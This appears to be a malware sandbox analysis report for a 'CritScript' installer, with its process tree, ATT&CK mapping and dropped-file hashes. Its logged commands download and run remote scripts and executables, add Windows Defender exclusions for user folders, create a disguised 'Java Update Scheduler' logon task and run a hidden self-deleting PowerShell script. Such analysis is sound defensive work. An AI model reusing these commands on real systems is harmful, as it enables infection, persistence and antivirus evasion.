2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
3144	AcroRd32.exe
3144	AcroRd32.exe
3144	AcroRd32.exe
3144	AcroRd32.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe
3440	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exeCritScript.exeJUSCHED.EXEjusched.exeOpenWith.exeOpenWith.exewmplayer.exeunregmp2.exeOpenWith.exechrome.exe

description	pid	process	target process
PID 1072 wrote to memory of 5056	1072	cmd.exe	powershell.exe
PID 1072 wrote to memory of 5056	1072	cmd.exe	powershell.exe
PID 1072 wrote to memory of 3792	1072	cmd.exe	cmd.exe
PID 1072 wrote to memory of 3792	1072	cmd.exe	cmd.exe
PID 3792 wrote to memory of 3680	3792	cmd.exe	cacls.exe
PID 3792 wrote to memory of 3680	3792	cmd.exe	cacls.exe
PID 3792 wrote to memory of 4844	3792	cmd.exe	powershell.exe
PID 3792 wrote to memory of 4844	3792	cmd.exe	powershell.exe
PID 3792 wrote to memory of 2972	3792	cmd.exe	powershell.exe
PID 3792 wrote to memory of 2972	3792	cmd.exe	powershell.exe
PID 3792 wrote to memory of 324	3792	cmd.exe	powershell.exe
PID 3792 wrote to memory of 324	3792	cmd.exe	powershell.exe
PID 3792 wrote to memory of 4904	3792	cmd.exe	powershell.exe
PID 3792 wrote to memory of 4904	3792	cmd.exe	powershell.exe
PID 3792 wrote to memory of 4952	3792	cmd.exe	powershell.exe
PID 3792 wrote to memory of 4952	3792	cmd.exe	powershell.exe
PID 3792 wrote to memory of 2720	3792	cmd.exe	powershell.exe
PID 3792 wrote to memory of 2720	3792	cmd.exe	powershell.exe
PID 3792 wrote to memory of 4888	3792	cmd.exe	CritScript.exe
PID 3792 wrote to memory of 4888	3792	cmd.exe	CritScript.exe
PID 3792 wrote to memory of 4888	3792	cmd.exe	CritScript.exe
PID 3792 wrote to memory of 2536	3792	cmd.exe	timeout.exe
PID 3792 wrote to memory of 2536	3792	cmd.exe	timeout.exe
PID 4888 wrote to memory of 2412	4888	CritScript.exe	JUSCHED.EXE
PID 4888 wrote to memory of 2412	4888	CritScript.exe	JUSCHED.EXE
PID 2412 wrote to memory of 3184	2412	JUSCHED.EXE	schtasks.exe
PID 2412 wrote to memory of 3184	2412	JUSCHED.EXE	schtasks.exe
PID 2412 wrote to memory of 4012	2412	JUSCHED.EXE	jusched.exe
PID 2412 wrote to memory of 4012	2412	JUSCHED.EXE	jusched.exe
PID 4012 wrote to memory of 4788	4012	jusched.exe	schtasks.exe
PID 4012 wrote to memory of 4788	4012	jusched.exe	schtasks.exe
PID 3792 wrote to memory of 4944	3792	cmd.exe	JUSCHED.EXE
PID 3792 wrote to memory of 4944	3792	cmd.exe	JUSCHED.EXE
PID 3792 wrote to memory of 3860	3792	cmd.exe	timeout.exe
PID 3792 wrote to memory of 3860	3792	cmd.exe	timeout.exe
PID 3792 wrote to memory of 1816	3792	cmd.exe	powershell.exe
PID 3792 wrote to memory of 1816	3792	cmd.exe	powershell.exe
PID 2072 wrote to memory of 3144	2072	OpenWith.exe	AcroRd32.exe
PID 2072 wrote to memory of 3144	2072	OpenWith.exe	AcroRd32.exe
PID 2072 wrote to memory of 3144	2072	OpenWith.exe	AcroRd32.exe
PID 3440 wrote to memory of 3680	3440	OpenWith.exe	wmplayer.exe
PID 3440 wrote to memory of 3680	3440	OpenWith.exe	wmplayer.exe
PID 3440 wrote to memory of 3680	3440	OpenWith.exe	wmplayer.exe
PID 3680 wrote to memory of 2012	3680	wmplayer.exe	unregmp2.exe
PID 3680 wrote to memory of 2012	3680	wmplayer.exe	unregmp2.exe
PID 3680 wrote to memory of 2012	3680	wmplayer.exe	unregmp2.exe
PID 2012 wrote to memory of 4616	2012	unregmp2.exe	unregmp2.exe
PID 2012 wrote to memory of 4616	2012	unregmp2.exe	unregmp2.exe
PID 3104 wrote to memory of 3044	3104	OpenWith.exe	chrome.exe
PID 3104 wrote to memory of 3044	3104	OpenWith.exe	chrome.exe
PID 3044 wrote to memory of 2752	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 2752	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3948	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3948	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3948	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3948	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3948	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3948	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3948	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3948	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3948	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3948	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3948	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3948	3044	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CritScriptInstaller.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/CritScript.bat' -OutFile CritScript.bat"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K CritScript.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3792
- - C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    3⤵
    PID:3680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin/Desktop'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin/Downloads'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin/AppData/'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:324
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/CritScript.exe' -OutFile CritScript.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4904
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/ahk.ico' -OutFile ahk.ico"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/shortcut.ps1' -OutFile shortcut.ps1"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2720
- - C:\Users\Admin\AppData\Local\Temp\CritScript.exe
    CritScript.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4888
  - - C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE
      "C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2412
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3184
    - - C:\Users\Admin\AppData\Roaming\Java\jusched.exe
        
        "C:\Users\Admin\AppData\Roaming\Java\jusched.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4012
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4788
- - C:\Windows\system32\timeout.exe
    timeout /t 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2536
- - C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE
    jusched.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4944
- - C:\Windows\system32\timeout.exe
    timeout /t 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\shortcut.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Deletes itself
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1816

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2072
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ZOMBIES.AHK"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
  PID:3144

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3440
- C:\Program Files (x86)\Windows Media Player\wmplayer.exe
  "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play "C:\Users\Admin\AppData\Local\Temp\ZOMBIES.AHK"
  2⤵
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:3680
- - C:\Windows\SysWOW64\unregmp2.exe
    "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2012
  - - C:\Windows\system32\unregmp2.exe
      "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
      4⤵
      Enumerates connected drives
      Suspicious use of AdjustPrivilegeToken
      PID:4616
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 704
    3⤵
    - Program crash
    PID:2148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
1⤵
- Drops file in Windows directory
PID:3200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3680 -ip 3680
1⤵
PID:2616

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:3104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\Admin\Desktop\CritScript.ahk.lnk"
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f57bcc40,0x7ff9f57bcc4c,0x7ff9f57bcc58
    3⤵
    PID:2752
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,953938316273249510,17636003095882433146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1924 /prefetch:2
    3⤵
    PID:3948
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1772,i,953938316273249510,17636003095882433146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:3
    3⤵
    PID:2096
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2204,i,953938316273249510,17636003095882433146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2216 /prefetch:8
    3⤵
    PID:4692
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,953938316273249510,17636003095882433146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3124 /prefetch:1
    3⤵
    PID:4296
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,953938316273249510,17636003095882433146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
    3⤵
    PID:1260
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4724,i,953938316273249510,17636003095882433146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:8
    3⤵
    PID:5088
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,953938316273249510,17636003095882433146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4780 /prefetch:8
    3⤵
    PID:1064
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4460,i,953938316273249510,17636003095882433146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4936 /prefetch:1
    3⤵
    PID:2224
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4980,i,953938316273249510,17636003095882433146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5108 /prefetch:1
    3⤵
    PID:3388

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
f2defd0310b029c3f6b90d3ed4a27656

SHA1
2e366578cc178a78cde56f6dc3b046f5103f9f5a

SHA256
b234429476908d4a60bcd8b0e52852291f74b1f53c3cc13228b9d2a6a6f60de2

SHA512
969dda7ed18134bfd5c1cb40666628a75c44d5f32f5a5f2e79c08d840e5260f2aec35672fa47e70b14293b54e3e27321bc685d591ce93d157f8861a126592995

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
564382e383b188f85b58f7ecae1c97cf

SHA1
6eb5a8829a0c7e0d5109a2eeb2ddc280ad7e2767

SHA256
5b0d74e746366c1985b1e007f5455d60e777961363e3477883e9e339f01f1150

SHA512
cda133ee08df249c5f412625a30610d80ffb26e1cf4d375d1579594173eb67969f9287bab90a655d814373f544fe8ee7dd01329b0fe0582a47dcee4837f2b6ee

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
25b8e4bbf41d25e63e798e962815e35c

SHA1
7eac030f3ef4742bd0a8c734ef23fe6e77e6619b

SHA256
4aff5b08fffcb63995fd6809252ea926c3234f9d0c59ceea0e8ceb1b0e1ef794

SHA512
b60d0e68c6e0c0f6adb851310b2fd52972e0f92ff144168383c05b76ad7ccbf89890c786440329a6b81dc823665c015c48069832acfe304a005f19ba2a10669b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e1d8ca3b94c02333f078e62c5ca1f4db

SHA1
f481b6aac18b7b9334fc7114af82b6256d0ba934

SHA256
30a4abc058357bfa7daa2ee8fa3e56c6c8168978c5253858ec324bbc36f70760

SHA512
1e2ac744579e08bdb422e463de23bca40585776f4e77db05975086d8f1f82e49ca0f41a54aa755e2846f3e205e93ee5262c4318745b5954125174041b4209095

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
41978b8a33babc7fc26f64f13dc2c0f3

SHA1
3e41df65fd6b42a4987ad03a0f3ccfd911b5ca04

SHA256
61adedd6b0e9b79c3b63bdf39b901ed061b40e1ae5d7c1a202356c2ac11a434f

SHA512
c0ad945cd2c90615f4bed03ff097f35d693b4ca89bd19a8569d46781f084aadd7c579dd6bb1257c37191f319fd4c4c271e3a3f29c1e79e970028d57386935619

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
234KB

MD5
2400c91b580a09f497be68a818fbb37d

SHA1
5378f288723566ab1927dd6ed26937eb761dc402

SHA256
7998da84c600ddaf792bdad8f247dc27b1baf18a5d7386cc9b4005b8ba7c6e6e

SHA512
b9e22ace8138fc13330203f9bb723461324bbb8ccf4fa95648e98f163663f2b8c634ce8d133d2ae19b478ce4de3973cb7cb08ccba551cc4a7345d58e85371bb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\jusched.exe.log

Filesize
1KB

MD5
b4e91d2e5f40d5e2586a86cf3bb4df24

SHA1
31920b3a41aa4400d4a0230a7622848789b38672

SHA256
5d8af3c7519874ed42a0d74ee559ae30d9cc6930aef213079347e2b47092c210

SHA512
968751b79a98961f145de48d425ea820fd1875bae79a725adf35fc8f4706c103ee0c7babd4838166d8a0dda9fbce3728c0265a04c4b37f335ec4eaa110a2b319

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
384KB

MD5
0fe67ead1c2fce47a6d9579a7e3613c1

SHA1
ecbd370ce5d53da4043f5443dc06473afb75f87d

SHA256
e167880544b02acebef4994b3557c159ea93b9bf1a06498f7be2bf913e9eda8a

SHA512
488e7a86aabe1bb5a619b66986dd6a49979e62aeb99648d15da6a52461c5c879579f5d5c21af8057b7759437badf750a23dd1b1a26d06c562eabc9758df344b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
1024KB

MD5
705228cb1aaca55829a6cb89335f5946

SHA1
eb29dc68f9c4e2bfc4922120c61f71ae2f07c001

SHA256
679c51a3c30dfaa6a174d7ea84466eb33545c36d8baf426235fec814ffe1b5da

SHA512
477cacd975d87ae457d9b2eb33e08275cdf20db0f2f6f35692de7f9be5b395ce1abbce18e20c767ba2bb764baf81c03fd634f7686a683187f2e3d7acf3f049d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

Filesize
498B

MD5
90be2701c8112bebc6bd58a7de19846e

SHA1
a95be407036982392e2e684fb9ff6602ecad6f1e

SHA256
644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf

SHA512
d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c60f51d17a93e3653c7807401c1fb41f

SHA1
50a33e1b80fd832ab0235dce2885f87d0462c1f7

SHA256
cd73b535d12578962466c2416656d13fb3800a733fcc46ca93442f7e36c03a25

SHA512
6cf909f01b4cfbabb2758167d0750128a9aa149297baea0bf8e5165992324c079e7221b9eb81413dbfa8476a2afc7f54daef9c532732b6f9b3eda89a5c4f92cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
da255d6e827f6f566661652c5f08620e

SHA1
27a36eb35d67c0ef70bf71d5be1a989641808d65

SHA256
a3b85d0066eeb4d7f0ce0c48eacbb922d6b48fd108c611f7cd05835fc0acc956

SHA512
7aa629b4929885cf5c42bc1d280083dbd31ccac6425f6757cfce07dbbe4ad33a85fff1d4f8907505dc13f710d4308ee06d1fbc77e365b6b0392c8328b2fc99d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
b16dc67d8633fb86f9d9dc491097150e

SHA1
0ea564df2675c5e2a82449530dd070ad855dfcd6

SHA256
378c51f20fe67c7ef650d594dca84dd39f8eaeb28876fe783bb3f98394bb494b

SHA512
c41852fc8c6728dce8aaa7d9104b39c9e9a6bdcc0354ff5e0d0bff3c055b9aebbb080111c90f6b70db28a1e81b8ca1e3cfec4f8a4f6e59a75188215c21788cdd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7355f4a1d4e1a2519a4a60ee11f1d192

SHA1
8802bbb71f3e8947c02a7d835b31c7abf4289780

SHA256
2fac16b31607552d8f35d56232cb768ddc2f393c6162d243482466527005f4e3

SHA512
7186100f86bc7a161667583daa5419d3b75acf620892610e0fab26866a4a300795a270bb5009b7af115216569c0d854fe1e3a68121af6f734fc16f7bfaed2d33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bf0d9383a1c964245a915edf6203c322

SHA1
fd9dc8c0752afa9fd4a895a3f2426d60908abe11

SHA256
67f5dcb31894c8ce004969c8a8d470b2635740697ea1918a128abd4589fbbaa1

SHA512
6a7e32772f4eb3e6d4ee6135cc6c4ee0d6f7f6646e33c89e57bd9f1c90b42cd19c2d09624c42ec42120c2502ff6c912e31d0bd0299cc980571e1e9bba6b64c2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\CritScript.bat

Filesize
2KB

MD5
42b967e318ec3384c82049f18bff79f5

SHA1
c719bfd3fe63989c68c170e59ae8aa5ccb479b25

SHA256
6a5596feba2d73f3390ede572e09c3edce0da3df1e679838cdb51dc7c1df805e

SHA512
b578ada683bfa871a19baad1c62b04315c2fdb4e193371971202e0476470e75fe8a9fc5cb75b6a79f73657ce35a1e10929f5df585634fcb9a755b6ba4193f166

Download Submit
C:\Users\Admin\AppData\Local\Temp\CritScript.exe

Filesize
3.2MB

MD5
c28dc010fc5198442496bc07dd50cd5d

SHA1
0f90a005815c2700a65ea85ae86f13a182cc11e6

SHA256
